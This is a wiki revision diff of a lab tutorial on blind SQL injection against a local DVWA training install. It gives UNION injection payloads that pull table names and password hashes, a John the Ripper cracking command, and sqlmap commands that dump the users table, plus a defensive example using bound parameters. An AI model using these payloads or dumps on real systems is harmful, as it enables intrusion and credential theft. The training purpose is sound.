Difference between revisions of "DVWA: SQLi blind"

From OnnoWiki
 
(4 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
DVWA-BLIND SQL INJECTION : LOW Level
 
DVWA-BLIND SQL INJECTION : LOW Level
  
1. Open Local host  http://localhost/dvwa
+
* Buka DVWA, misalnya http://localhost/DVWA-1.9
  
 
  Username :  Admin
 
  Username :  Admin
 
  Password : Password
 
  Password : Password
  
3.Select SQL Injection BLIND and  column ID issued 1' and 1=1#
+
* Pilih SQL Injection BLIND dan dalam kolom ID masukan
  
 +
1' and 1=1#
 
  1' and 1=1 order by 2 #
 
  1' and 1=1 order by 2 #
 +
ID: 'or' 1=1--
  
5.ID: 'or' 1=1--
+
Kita akan lihat ada 5 user
  
we can see there are 5 user
+
* Melihat informasi table
 
 
5. now see information table
 
  
 
  1' and 1=0 union select null,table_name from information_schema.tables#
 
  1' and 1=0 union select null,table_name from information_schema.tables#
 +
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
  
6..1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
+
* Melihat informasi table name dari table user
 
 
7. Information table name from table user
 
  
 
  1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
 
  1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
  
8. on the last lets see  user name and password
+
* Terakhir lihat username dan password
  
 
  1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
 
  1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  
9. we will crack the md5 password
+
* Crack md5 password
 
 
copy the passowrd into kwrite and save with name hash
 
next
 
 
 
 
 
root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
 
 
 
 
 
OK GOOD LUCK
 
 
 
Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.
 
 
 
1. afer login in DVWA and choose DVWA Securty Low
 
2. follow this picture
 
 
 
In User ID write '1
 
 
 
than show
 
 
 
we have an error and my conclusion that this is sql injection, not blind.
 
 
 
3. copy url and open your console
 
 
 
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
 
 
 
 
  
 +
copy hasil password hash yang diperoleh, save misalnya dengan nama hash
  
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
+
Lakukan
we get this information by tamer data ini browser's tools
 
  
4. Now Looking for Database tables
+
  root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
 
  
 +
==Exploit DVWA menggunakan SQLmap==
  
5. netx search User's Table
+
* Login ke DVWA
 +
* Pilih DVWA Security Low
 +
* Pada user ID tulis '1
 +
* Jalankan addon tamer di browser
 +
* Lakukan di terminal,
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
+
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  
 +
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
  
6. Look at field password.. we will dump it
+
di peroleh dari addon tamer di browser.
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
+
* lihat tables
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  
OK GOOD LUCK
+
* lihat kolom di user tabel
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  
 +
* lihat field password & dump
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
  
 
==Referensi==
 
==Referensi==
  
 
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html
 
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html
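
Review bot: the two payload lines that end in table_name='users'' # carry a doubled apostrophe, which MediaWiki reads as italic markup, so the rendered revision shows table_name='users # with the closing quote missing. Put the payload and command lines in <pre> or <nowiki> so they display as typed. The revision also removes the old step's observation that entering '1 returned an error ("this is sql injection, not blind"), and the sqlmap commands still embed one fixed PHPSESSID value. A short line saying the cookie must be replaced with the reader's own session value would help.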

Latest revision as of 07:51, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level

Username :  Admin
Password : Password
  • Select SQL Injection BLIND and enter the following in the ID field
1' and 1=1#
1' and 1=1 order by 2 #
ID: 'or' 1=1--

We will see that there are 5 users

  • View the table information
1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users' #
  • View the table name information from the users table
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' #
  • Finally, view the usernames and passwords
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  • Crack the MD5 passwords
Copy the password hashes obtained and save them, for example under the name hash

Run

 root@bt:/pentest/passwords/john#./john --format=raw-md5 hash 
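
Why the inputs above succeed at the Low level and what stops them, as an added example (not part of the original page and not DVWA's own code). It assumes a constructed SQLite table standing in for DVWA's MySQL users table, so the page's # comment becomes "-- " and concat() becomes ||; all function names and rows are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the users table (SQLite in memory, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT,"
               " last_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?)", [
        ("1", "admin", "admin", "hash-placeholder-1"),   # constructed rows
        ("2", "Gordon", "Brown", "hash-placeholder-2"),
    ])
    return db

def lookup_concat(db, user_id):
    """Vulnerable form: the ID is pasted into the SQL text, so a quote in the
    input closes the string literal and the rest is parsed as SQL."""
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = '"
           + user_id + "'")
    return db.execute(sql).fetchall()

def lookup_bound(db, user_id):
    """Hardened form: the ID is a bound parameter and is only compared as data."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# The page's last UNION input, adapted to SQLite syntax (assumption: '-- ' and ||)
UNION_INPUT = ("1' and 1=0 union select null, "
               "first_name || char(10) || password from users -- ")

def answers_conditions(lookup, db):
    """Regression check for a test suite: if a true and a false condition
    appended to the ID change the result, the input reaches the SQL parser."""
    true_rows = lookup(db, "1' and 1=1 -- ")
    false_rows = lookup(db, "1' and 1=0 -- ")
    return true_rows != false_rows

if __name__ == "__main__":
    db = make_db()
    print("concat, union input:", lookup_concat(db, UNION_INPUT))
    print("bound,  union input:", lookup_bound(db, UNION_INPUT))
    print("concat answers conditions:", answers_conditions(lookup_concat, db))
    print("bound answers conditions: ", answers_conditions(lookup_bound, db))
```

With the bound parameter the whole input is compared against user_id as one string, so it matches no row and the true/false conditions give the same empty result.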


Exploit DVWA using SQLmap

  • Log in to DVWA
  • Select DVWA Security Low
  • In the User ID field, enter '1
  • Run the Tamper Data add-on in the browser
  • Run in a terminal:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

is obtained from the Tamper Data add-on in the browser.

  • View the tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  • View the columns in the users table
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  • View the password field and dump it
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
